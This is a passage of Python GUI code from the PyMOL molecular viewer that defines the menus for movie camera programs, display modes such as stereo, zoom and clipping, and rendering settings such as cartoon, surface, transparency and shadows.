self.menuBar.addmenuitem('X-Rock', 'command', '90 deg. over 6 sec.',label='90 deg. over 6 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(6,90,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '90 deg. over 12 sec.',label='90 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(12,90,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '90 deg. over 24 sec.',label='90 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(24,90,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'separator', '')
self.menuBar.addmenuitem('X-Rock', 'command', '120 deg. over 8 sec.',label='120 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,120,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '120 deg. over 16 sec.',label='120 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(16,120,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '120 deg. over 32 sec.',label='120 deg. over 32 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(32,120,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'separator', '')
self.menuBar.addmenuitem('X-Rock', 'command', '180 deg. over 12 sec.',label='180 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(12,179.99,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '180 deg. over 24 sec.',label='180 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(24,179.99,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '180 deg. over 48 sec.',label='180 deg. over 48 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(48,179.99,axis='x',start=%d)"))
self.menuBar.addcascademenu('Camera', 'X-Roll', 'X-Roll',
label='X-Roll')
self.menuBar.addmenuitem('X-Roll', 'command', '4 seconds',label='4 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(4.0,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Roll', 'command', '8 seconds',label='8 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(8.0,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Roll', 'command', '16 seconds',label='16 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(16.0,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Roll', 'command', '32 seconds',label='32 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(32.0,axis='x',start=%d)"))
self.menuBar.addmenuitem('Camera', 'separator', '')
self.menuBar.addcascademenu('Camera', 'Y-Rock', 'Y-Rock',
label='Y-Rock')
self.menuBar.addmenuitem('Y-Rock', 'command', '30 deg. over 2 sec.',label='30 deg. over 2 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(2,30,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '30 deg. over 4 sec.',label='30 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(4,30,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '30 deg. over 8 sec.',label='30 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,30,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'separator', '')
self.menuBar.addmenuitem('Y-Rock', 'command', '60 deg. over 4 sec.',label='60 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(4,60,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '60 deg. over 8 sec.',label='60 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,60,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '60 deg. over 16 sec.',label='60 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(16,60,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'separator', '')
self.menuBar.addmenuitem('Y-Rock', 'command', '90 deg. over 6 sec.',label='90 deg. over 6 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(6,90,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '90 deg. over 12 sec.',label='90 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(12,90,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '90 deg. over 24 sec.',label='90 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(24,90,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'separator', '')
self.menuBar.addmenuitem('Y-Rock', 'command', '120 deg. over 8 sec.',label='120 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,120,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '120 deg. over 16 sec.',label='120 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(16,120,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '120 deg. over 32 sec.',label='120 deg. over 32 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(32,120,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'separator', '')
self.menuBar.addmenuitem('Y-Rock', 'command', '180 deg. over 12 sec.',label='180 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(12,179.99,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '180 deg. over 24 sec.',label='180 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(24,179.99,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '180 deg. over 48 sec.',label='180 deg. over 48 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(48,179.99,axis='y',start=%d)"))
self.menuBar.addcascademenu('Camera', 'Y-Roll', 'Y-Roll',
label='Y-Roll')
self.menuBar.addmenuitem('Y-Roll', 'command', '4 seconds',label='4 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(4.0,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Roll', 'command', '8 seconds',label='8 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(8.0,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Roll', 'command', '16 seconds',label='16 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(16.0,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Roll', 'command', '32 seconds',label='32 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(32.0,axis='y',start=%d)"))
self.menuBar.addmenuitem('Program', 'separator', '')
self.menuBar.addcascademenu('Program', 'Scene Loop', 'Scene Loop',
label='Scene Loop')
for label, rock in [('Nutate', 4), ('X-Rock', 2), ('Y-Rock', 1)]:
mlabel = 'SL-' + label
self.menuBar.addcascademenu('Scene Loop', mlabel, label, label=label)
for angle, seconds in ((30, (2,4,8)), (60, (4,8,16)), (90, (6,12,24)), (120, (8,16,32))):
if angle != 30:
self.menuBar.addmenuitem(mlabel, 'separator', '')
for sec in seconds:
label = '%d deg. over %d sec.' % (angle, sec)
self.menuBar.addmenuitem(mlabel, 'command', label, label=label,
command=self.mvprg_scene_loop(sec, rock, angle))
self.menuBar.addcascademenu('Scene Loop', 'No-Motion', 'Steady',
label='Steady')
self.menuBar.addmenuitem('No-Motion', 'command', '1 second each',label='1 second each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,1.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '2 seconds each',label='2 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,2.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '4 seconds each',label='4 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,4.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '8 seconds each',label='8 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,8.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '12 seconds each',label='12 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,12.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '16 seconds each',label='16 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,16.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '24 seconds each',label='24 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,24.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('Program', 'separator', '')
self.menuBar.addcascademenu('Program', 'StateLoop', 'State Loop',
label='State Loop')
self.menuBar.addcascademenu('Program', 'StateSweep', 'State Sweep',
label='State Sweep')
speed_list = [ 1, 2, 3, 4, 8, 16 ]
pause_list = [ 0, 1, 2, 4 ]
for speed in speed_list:
submenu1_id = 'StateLoop' + '%d'%speed
submenu2_id = 'StateSweep' + '%d'%speed
if speed==1:
submenu_title = "Full Speed"
else:
submenu_title = "1/%d Speed"%speed
self.menuBar.addcascademenu('StateLoop', submenu1_id, label=submenu_title)
self.menuBar.addcascademenu('StateSweep', submenu2_id, label=submenu_title)
for pause in pause_list:
if not pause:
item_name = "no pause"
else:
item_name = "%d second pause"%pause
self.menuBar.addmenuitem(submenu1_id, 'command', item_name,
label=item_name,
command = lambda
s=self, st="_ movie.%s(%d,%d"%
("add_state_loop", speed, pause):
s.mvprg(st+",start=%d)"))
self.menuBar.addmenuitem(submenu2_id, 'command', item_name,
label=item_name,
command = lambda
s=self, st="_ movie.%s(%d,%d"%
("add_state_sweep", speed, pause):
s.mvprg(st+",start=%d)"))
self.menuBar.addmenuitem('Movie', 'separator', '')
self.menuBar.addmenuitem('Movie', 'command', 'Reset',label='Reset',
command = lambda s=self: s.cmd.do("_ mset;rewind;"))
self.menuBar.addmenuitem('Movie', 'separator', '')
self.menuBar.addcascademenu('Movie', 'Frame Rate', 'Playback Frame Rate',
label='Frame Rate')
for val in [30, 15, 5, 1, 0.3]:
addmenuitem('Frame Rate', 'radiobutton', label=str(val) + ' FPS',
value=val, variable=self.setting.movie_fps)
self.menuBar.addmenuitem('Frame Rate', 'separator', '')
self.menuBar.addmenuitem('Frame Rate', 'checkbutton',
'Show Frame Frame.',
label='Show Frame Rate',
variable = self.setting.show_frame_rate,
)
self.menuBar.addmenuitem('Frame Rate', 'command', 'Reset Meter',
label='Reset Meter',
command = lambda s=self: s.cmd.do("_ meter_reset"))
self.menuBar.addmenuitem('Movie', 'separator', '')
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Auto Interpolate',
label='Auto Interpolate',
variable = self.setting.movie_auto_interpolate,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Show Panel',
label='Show Panel',
variable = self.setting.movie_panel,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Loop Frames',
label='Loop Frames',
variable = self.setting.movie_loop,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Photorealistic images.',
label='Draw Frames',
variable = self.setting.draw_frames,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Photorealistic images.',
label='Ray Trace Frames',
variable = self.setting.ray_trace_frames,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Save images in memory.',
label='Cache Frame Images',
variable = self.setting.cache_frames,
)
self.menuBar.addmenuitem('Movie', 'command', 'Clear Image Cache',
label='Clear Image Cache',
command = lambda s=self: s.cmd.mclear())
self.menuBar.addmenuitem('Movie', 'separator', '')
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Static Singletons Objects',
label='Static Singletons',
variable = self.setting.static_singletons,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Superimpose all molecular states.',
label='Show All States',
variable = self.setting.all_states,
)
self.menuBar.addmenu('Display', 'Display Control',tearoff=TRUE)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Sequence',
label='Sequence',
variable = self.setting.seq_view,
)
self.menuBar.addcascademenu('Display', 'Sequence', 'Sequence Mode',
label='Sequence Mode')
var = self.setting.seq_view_format
for lab, val in [
('Residue Codes', 0),
('Residue Names', 1),
('Chain Identifiers', 3),
('Atom Names', 2),
('States', 4),
]:
addmenuitem('Sequence', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Sequence', 'separator', '')
var = self.setting.seq_view_label_mode
for lab, val in [
('All Residue Numbers', 2),
('Top Sequence Only', 1),
('Object Names Only', 0),
('No Labels', 3),
]:
addmenuitem('Sequence', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Stereo',
label='Stereo',
variable = self.setting.stereo,
)
# self.menuBar.addmenuitem('Display', 'command', 'Stereo On',
# label='Stereo On',
# command = lambda s=self: s.cmd.do("_ stereo on"))
# self.menuBar.addmenuitem('Display', 'command', 'Stereo Off',
# label='Stereo Off',
# command = lambda s=self: s.cmd.do("_ stereo off"))
self.menuBar.addcascademenu('Display', 'Stereo', 'Stereo Mode',
label='Stereo Mode')
self.menuBar.addmenuitem('Stereo', 'command', 'Anaglyph Stereo',
label='Anaglyph Stereo',
command = lambda s=self: s.cmd.do("_ stereo anaglyph"))
self.menuBar.addmenuitem('Stereo', 'command', 'Cross-Eye Stereo',
label='Cross-Eye Stereo',
command = lambda s=self: s.cmd.do("_ stereo crosseye"))
self.menuBar.addmenuitem('Stereo', 'command', 'Wall-Eye Stereo',
label='Wall-Eye Stereo',
command = lambda s=self: s.cmd.do("_ stereo walleye"))
self.menuBar.addmenuitem('Stereo', 'command', 'Quad-Buffered Stereo',
label='Quad-Buffered Stereo',
command = lambda s=self: s.cmd.do("_ stereo quadbuffer"))
self.menuBar.addmenuitem('Stereo', 'command', 'Zalman Stereo',
label='Zalman Stereo',
command = lambda s=self: s.cmd.do("_ stereo byrow"))
self.menuBar.addmenuitem('Stereo', 'separator', '')
self.menuBar.addmenuitem('Stereo', 'command', 'Swap Sides',
label='Swap Sides',
command = lambda s=self: s.cmd.do("_ stereo swap"))
self.menuBar.addmenuitem('Display', 'separator', '')
self.menuBar.addcascademenu('Display', 'Zoom', 'Zoom',
label='Zoom')
self.menuBar.addmenuitem('Zoom', 'command', '4 Angstrom Sphere',
label='4 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,4,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', '6 Angstrom Sphere',
label='6 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,6,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', '8 Angstrom Sphere',
label='8 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,8,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', '12 Angstrom Sphere',
label='12 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,12,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', '20 Angstrom Sphere',
label='20 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,20,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', 'All',
label='All',
command = lambda s=self: s.cmd.do("_ zoom all,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', 'Complete',
label='Complete',
command = lambda s=self: s.cmd.do("_ zoom all,complete=1,animate=-1"))
self.menuBar.addcascademenu('Display', 'Clip', 'Clip',
label='Clip')
self.menuBar.addmenuitem('Clip', 'command', 'Nothing',
label='Nothing',
command = lambda s=self: s.cmd.do("_ clip atoms,5,all"))
self.menuBar.addmenuitem('Clip', 'command', '8 Angstrom Slab',
label='8 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,8"))
self.menuBar.addmenuitem('Clip', 'command', '12 Angstrom Slab',
label='12 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,10"))
self.menuBar.addmenuitem('Clip', 'command', '16 Angstrom Slab',
label='16 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,15"))
self.menuBar.addmenuitem('Clip', 'command', '20 Angstrom Slab',
label='20 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,20"))
self.menuBar.addmenuitem('Clip', 'command', '30 Angstrom Slab',
label='30 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,30"))
self.menuBar.addmenuitem('Display', 'separator', '')
self.menuBar.addcascademenu('Display', 'Background', 'Background',
label='Background')
self.menuBar.addmenuitem('Background', 'checkbutton',
'Opaque Background Color',
label='Opaque',
variable = self.setting.opaque_background,
)
self.menuBar.addmenuitem('Background', 'checkbutton',
'Show Alpha Checker',
label='Show Alpha Checker',
variable = self.setting.show_alpha_checker,
)
self.menuBar.addmenuitem('Background', 'separator', '')
var = self.setting.bg_rgb
for lab, val in [
('White', 0), # white
('Light Grey', 134), # grey80
('Grey', 104), # grey50
('Black', 1), # black
]:
addmenuitem('Background', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addcascademenu('Display', 'Color Space', 'Color Space',
label='Color Space')
self.menuBar.addmenuitem('Color Space', 'command', 'CMYK (for publications)',
label='CMYK (for publications)',
command = lambda s=self: s.cmd.do("_ cmd.space('cmyk')"))
self.menuBar.addmenuitem('Color Space', 'command', 'PyMOL (for video & web)',
label='PyMOL (for video & web)',
command = lambda s=self: s.cmd.do("_ cmd.space('pymol')"))
self.menuBar.addmenuitem('Color Space', 'command', 'RGB (default)',
label='RGB (default)',
command = lambda s=self: s.cmd.do("_ cmd.space('rgb')"))
self.menuBar.addcascademenu('Display', 'Performance', 'Quality',
label='Quality')
self.menuBar.addmenuitem('Performance', 'command', 'Maximum Performance',
label='Maximum Performance',
command = lambda s=self: s.cmd.do("_ util.performance(100)"))
self.menuBar.addmenuitem('Performance', 'command', 'Reasonable Performance',
label='Reasonable Performance',
command = lambda s=self: s.cmd.do("_ util.performance(66)"))
self.menuBar.addmenuitem('Performance', 'command', 'Reasonable Quality',
label='Reasonable Quality',
command = lambda s=self: s.cmd.do("_ util.performance(33)"))
self.menuBar.addmenuitem('Performance', 'command', 'Maximum Quality',
label='Maximum Quality',
command = lambda s=self: s.cmd.do("_ util.performance(0)"))
self.menuBar.addcascademenu('Display', 'Grid', 'Grid',
label='Grid')
var = self.setting.grid_mode
for lab, val in [
('By Object', 1),
('By State', 2),
('By Object-State', 3),
('Disable', 0),
]:
addmenuitem('Grid', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Display', 'separator', '')
self.menuBar.addmenuitem('Display', 'checkbutton',
'Disable perspective.',
label='Orthoscopic View',
variable = self.setting.orthoscopic)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Show Valences.',
label='Show Valences',
variable = self.setting.valence,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Smooth Lines.',
label='Smooth Lines',
variable = self.setting.line_smooth,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Depth Cue (Fogging).',
label='Depth Cue',
variable = self.setting.depth_cue,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Two Sided Lighting.',
label='Two Sided Lighting',
variable = self.setting.two_sided_lighting,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Specular Reflections.',
label='Specular Reflections',
variable = self.setting.specular,
onvalue=1.0, offvalue=0.0,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Animation',
label='Animation',
variable = self.setting.animation,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Roving Detail',
label='Roving Detail',
variable = self.setting.roving_detail,
)
self.menuBar.addmenu('Setting', 'Settings and Configuration',tearoff=TRUE)
self.menuBar.addmenuitem('Setting', 'command',
'Edit PyMOL Settings',
label='Edit All...',
command = lambda s=self: SetEditor(s))
self.menuBar.addmenuitem('Setting', 'command',
'Edit PyMOL Colors',
label='Colors...',
command = lambda s=self: ColorEditor(s))
addmenuitem('Setting', 'separator', '')
self.menuBar.addcascademenu('Setting', 'Label', 'Label',
label='Label')
self.menuBar.addcascademenu('Label', 'LabelSize', 'Size',
label='Size',tearoff=TRUE)
for i in [10., 14., 18., 24., 36., 48., 72.]:
addmenuitem('LabelSize', 'radiobutton', label='%.0f Point' % i,
value=i, variable=self.setting.label_size)
self.menuBar.addmenuitem('LabelSize', 'separator', '')
for i in [-.3, -.5, -1., -2., -4.]:
addmenuitem('LabelSize', 'radiobutton', label='%.1f Angstrom' % (-i),
value=i, variable=self.setting.label_size)
self.menuBar.addcascademenu('Label', 'LabelFont', 'Font',
label='Font', tearoff=TRUE)
for label, val in [
('Sans', 5),
('Sans Oblique', 6),
('Sans Bold', 7),
('Sans Bold Oblique', 8),
('Serif', 9),
('Serif Oblique',17),
('Serif Bold', 10),
('Serif Bold Oblique', 18),
('Mono', 11),
('Mono Oblique', 12),
('Mono Bold', 13),
('Mono Bold Oblique', 14),
('Gentium Roman', 15),
('Gentium Italic', 16),
]:
addmenuitem('LabelFont', 'radiobutton', label=label, value=val,
variable=self.setting.label_font_id)
self.menuBar.addcascademenu('Setting', 'Cartoon', 'Cartoon',
tearoff=TRUE,
label='Cartoon')
self.menuBar.addcascademenu('Cartoon', 'Rings', 'Rings & Bases',
label='Rings & Bases')
for label, val in [
('Filled Rings (Round Edges)', 1),
('Filled Rings (Flat Edges)', 2),
('Filled Rings (with Border)', 3),
('Spheres', 4),
('Base Ladders', 0),
]:
addmenuitem('Rings', 'radiobutton', label=label, value=val,
variable=self.setting.cartoon_ring_mode)
self.menuBar.addmenuitem('Rings', 'separator', '')
for label, val in [
('Bases & Sugars', 1),
('Bases Only', 2),
('Non-protein Rings', 3),
('All Rings', 4),
]:
addmenuitem('Rings', 'radiobutton', label=label, value=val,
variable=self.setting.cartoon_ring_finder)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Side Chain Helper',
label='Side Chain Helper',
variable = self.setting.cartoon_side_chain_helper,
)
self.menuBar.addmenuitem('Rings', 'separator', '')
for label, val in [
('Transparent Rings', .5),
('Default', -1.),
]:
addmenuitem('Rings', 'radiobutton', label=label, value=val,
variable=self.setting.cartoon_ring_transparency)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Round Helices',
label='Round Helices',
variable = self.setting.cartoon_round_helices,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Fancy Helices',
label='Fancy Helices',
variable = self.setting.cartoon_fancy_helices,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Cylindrical Helices',
label='Cylindrical Helices',
variable = self.setting.cartoon_cylindrical_helices,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Flat Sheets',
label='Flat Sheets',
variable = self.setting.cartoon_flat_sheets,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Fancy Sheets',
label='Fancy Sheets',
variable = self.setting.cartoon_fancy_sheets,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Smooth Loops',
label='Smooth Loops',
variable = self.setting.cartoon_smooth_loops,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Discrete Colors',
label='Discrete Colors',
variable = self.setting.cartoon_discrete_colors,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Highlight Color',
label='Highlight Color',
variable = self.setting.cartoon_highlight_color,
onvalue=104, offvalue=-1,
)
addcascademenu('Cartoon', 'CartoonSampling', label='Sampling')
addmenuitem('CartoonSampling', 'radiobutton', label="Atom count dependent",
value=-1, variable=self.setting.cartoon_sampling)
for i in [2, 7, 14]:
addmenuitem('CartoonSampling', 'radiobutton', label=str(i),
value=i, variable=self.setting.cartoon_sampling)
addcascademenu('Cartoon', 'CartoonGapCutoff', label='Gap Cutoff')
for i in [0, 5, 10, 20]:
addmenuitem('CartoonGapCutoff', 'radiobutton', label=str(i),
value=i, variable=self.setting.cartoon_gap_cutoff)
self.menuBar.addcascademenu('Setting', 'Ribbon', 'Ribbon',
label='Ribbon')
self.menuBar.addmenuitem('Ribbon', 'checkbutton',
'Side Chain Helper',
label='Side Chain Helper',
variable = self.setting.ribbon_side_chain_helper,
)
self.menuBar.addmenuitem('Ribbon', 'checkbutton',
'Trace Atoms',
label='Trace Atoms',
variable = self.setting.ribbon_trace_atoms,
)
addmenuitem('Ribbon', 'separator')
addmenuitem('Ribbon', 'radiobutton', label='As Lines', value=0,
variable=self.setting.ribbon_as_cylinders)
addmenuitem('Ribbon', 'radiobutton', label='As Cylinders', value=1,
variable=self.setting.ribbon_as_cylinders)
addcascademenu('Ribbon', 'RibbonRadius', label='Cylinder Radius')
addmenuitem('RibbonRadius', 'radiobutton', label='Match Line Width',
value=0., variable=self.setting.ribbon_radius)
for val in [.2, .5, 1.]:
addmenuitem('RibbonRadius', 'radiobutton', label='%.1f Angstrom' % val,
value=val, variable=self.setting.ribbon_radius)
self.menuBar.addcascademenu('Setting', 'Surface', 'Surface',
label='Surface')
self.menuBar.addcascademenu('Surface', 'Surface Color', 'Color',
label='Color')
for label, val in [
('White', 0), # white
('Light Grey', 134), # grey80
('Grey', 24), # grey
('Default (Atomic)', -1),
]:
addmenuitem('Surface Color', 'radiobutton', label=label, value=val,
variable=self.setting.surface_color)
addmenuitem('Surface', 'separator', '')
for label, val in [
('Dot', 1),
('Wireframe', 2),
('Solid', 0),
]:
addmenuitem('Surface', 'radiobutton', label=label, value=val,
variable=self.setting.surface_type)
self.menuBar.addmenuitem('Surface', 'separator', '')
for label, val in [
('Exterior (Normal)', 0),
('Cavities & Pockets Only', 1),
('Cavities & Pockets (Culled)', 2),
]:
addmenuitem('Surface', 'radiobutton', label=label, value=val,
variable=self.setting.surface_cavity_mode)
self.menuBar.addcascademenu('Surface', 'Detection', 'Cavity Detection Radius',
label='Cavity Detection Radius')
for val in [7]:
addmenuitem('Detection', 'radiobutton', label='%d Angstrom' % val, value=float(val),
variable=self.setting.surface_cavity_radius)
for val in [3, 4, 5, 6, 8, 10, 20]:
addmenuitem('Detection', 'radiobutton', label='%d Solvent Radii' % val, value=val * -1.0,
variable=self.setting.surface_cavity_radius)
self.menuBar.addcascademenu('Surface', 'Cutoff', 'Cavity Detection Cutoff',
label='Cavity Detection Cutoff')
for val in [1, 2, 3, 4, 5]:
addmenuitem('Cutoff', 'radiobutton', label='%d Solvent Radii' % val, value=val * -1.0,
variable=self.setting.surface_cavity_cutoff)
self.menuBar.addmenuitem('Surface', 'separator', '')
self.menuBar.addmenuitem('Surface', 'checkbutton',
'Solvent Accessible',
label='Solvent Accessible',
variable = self.setting.surface_solvent,
)
addmenuitem('Surface', 'separator', '')
addmenuitem('Surface', 'checkbutton', label='Smooth Edges (Incentive-Only)',
state='disabled',
variable=self.setting.surface_smooth_edges)
addmenuitem('Surface', 'checkbutton', label='Edge Proximity',
variable=self.setting.surface_proximity)
self.menuBar.addmenuitem('Surface', 'separator', '')
for label, val in [
('Ignore None', 1),
('Ignore HETATMs', 0),
('Ignore Hydrogens', 2),
('Ignore Unsurfaced', 3),
]:
addmenuitem('Surface', 'radiobutton', label=label, value=val,
variable=self.setting.surface_mode)
self.menuBar.addcascademenu('Setting', 'Volume', label='Volume')
self.menuBar.addmenuitem('Volume', 'checkbutton', label='Pre-integrated Rendering (Incentive-Only)',
state='disabled',
variable = self.setting.volume_mode)
self.menuBar.addcascademenu('Volume', 'VolumeLayers', label='Number of Layers')
for i in (100., 256., 500., 1000.):
self.menuBar.addmenuitem('VolumeLayers', 'radiobutton', label='%.0f' % i,
value=i, variable=self.setting.volume_layers)
self.menuBar.addcascademenu('Setting', 'Transparency', 'Transparency',
label='Transparency')
self.transparency_menu('CartoonTransparency','Cartoon','cartoon_transparency')
self.transparency_menu('SurfaceTransparency','Surface','transparency')
self.transparency_menu('StickTransparency','Stick','stick_transparency')
self.transparency_menu('SphereTransparency','Sphere','sphere_transparency')
self.menuBar.addmenuitem('Transparency', 'separator', '')
for label, val, command in [
('Uni-Layer', 2, '_ set backface_cull, 1; set two_sided_lighting, 0'),
('Multi-Layer', 1, '_ set backface_cull, 0; set two_sided_lighting, 1'),
('Multi-Layer (Real-time OIT)', 3, ''),
('Fast and Ugly', 0, '_ set backface_cull, 1; set two_sided_lighting, 0'),
]:
addmenuitem('Transparency', 'radiobutton', label=label,
state='disabled' if val == 3 else 'normal', # not available in Open-Source PyMOL
value=val, variable=self.setting.transparency_mode,
command = lambda c=command: self.cmd.do(c))
addmenuitem('Transparency', 'separator', '')
addmenuitem('Transparency', 'checkbutton', label='Angle-dependent',
variable = self.setting.ray_transparency_oblique,
onvalue=1.0, offvalue=0.0)
self.menuBar.addcascademenu('Setting', 'Rendering', 'Rendering',
label='Rendering')
addmenuitem('Rendering', 'checkbutton', label='OpenGL 2.0 Shaders',
variable = self.setting.use_shaders)
addmenuitem('Rendering', 'separator', '')
self.menuBar.addmenuitem('Rendering', 'checkbutton',
'Smooth raytracing.',
label='Antialias (Ray Tracing)',
variable = self.setting.antialias,
)
self.menuBar.addmenuitem('Rendering', 'command', 'Modernize',
label='Modernize',
command = lambda s=self: s.util.modernize_rendering(1,s.cmd))
self.menuBar.addmenuitem('Rendering', 'separator', '')
self.menuBar.addcascademenu('Rendering', 'Shadows', 'Shadows',
label='Shadows')
self.menuBar.addmenuitem('Shadows', 'command', 'None',
label='None',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('none')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Light',
label='Light',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('light')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Medium',
label='Medium',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('medium')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Heavy',
label='Heavy',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('heavy')"))
